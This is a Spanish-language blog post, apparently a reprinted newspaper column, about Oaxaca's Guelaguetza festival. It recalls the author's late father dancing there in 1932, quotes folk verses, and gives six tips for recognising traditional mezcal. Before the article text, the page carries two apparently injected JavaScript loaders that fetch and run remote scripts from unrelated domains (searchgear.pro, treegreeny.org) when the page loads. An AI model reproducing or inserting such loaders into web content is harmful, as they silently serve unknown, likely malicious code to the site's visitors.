;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 85. Oaxaca, Guelaguetza y mezcal

85. Oaxaca, Guelaguetza y mezcal


Los lunes 25 de julio y 1º de agosto se celebrará en Oaxaca, como cada año desde 1932, el Lunes del Cerro, conocido en la actualidad como Guelaguetza. Los festejos siempre se realizan los dos últimos lunes de julio, después de la fiesta de la Virgen del Carmen, pero como este año coincidió el penúltimo de ellos con la fecha en que murió Benito Juárez, la fiesta se trasladó una semana después.
En 1932, mi padre formó parte de la delegación de Ejutla, y confieso que ha sido muy doloroso no poder recordar con él -dado que falleció en diciembre pasado- el largo y tardado viaje que hicieron ese año a la ciudad de Oaxaca, las peripecias que pasaron durante el mismo y los nombres de sus compañeros con quienes bailó aquel año en el Cerro del Fortín. Pero como la Guelaguetza es fiesta, mejor trascribiré algunos de los versos que él solía cantar, y bailar, con el fin de que yo los recordara para siempre:
El palomo y la paloma
se fueron para Rosina;
la paloma que se agacha
y el palomo que le atina.
Ya con esta me despido,
terminando me echo un grito;
y a todos les voy a dar
un trago de mezcalito.
Habrá quienes visiten Oaxaca durante estas fiestas, y seguramente querrán saborear Mezcales Tradicionales (MT), por lo que daré seis tips para que no los engañen con destilados chatarra:
1. El mezcal a saborear debe perlear; pidan que se los venencien, o agiten la botella para ver las perlas. Si no hace perlas, no es MT.
2. Si el mezcal está etiquetado debe tener como mínimo 45º.
3. No debe tener color amaderado; la barrica destruye los aromas y sabores del mezcal.
4. El único mezcal minero es el de Santa Catarina Minas y se destila en ollas de barro, por lo que huele y sabe a barro.
5. El mezcal de pechuga se destila con pechuga de gallina o de guajolota y es incoloro
6. Las “cremas de mezcal” no son mezcal.
Quien desee tomar 3 MT oaxaqueños (de Matatlán, de Yogana y de Santa Catarina Minas), acuda a la sesión de la Logia de los Mezcólatras en Red Fly el martes 26 a las 20 horas: Orizaba 145, Roma, DF.

http://impreso.milenio.com/node/8996889

Category: Milenio, Publicaciones

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *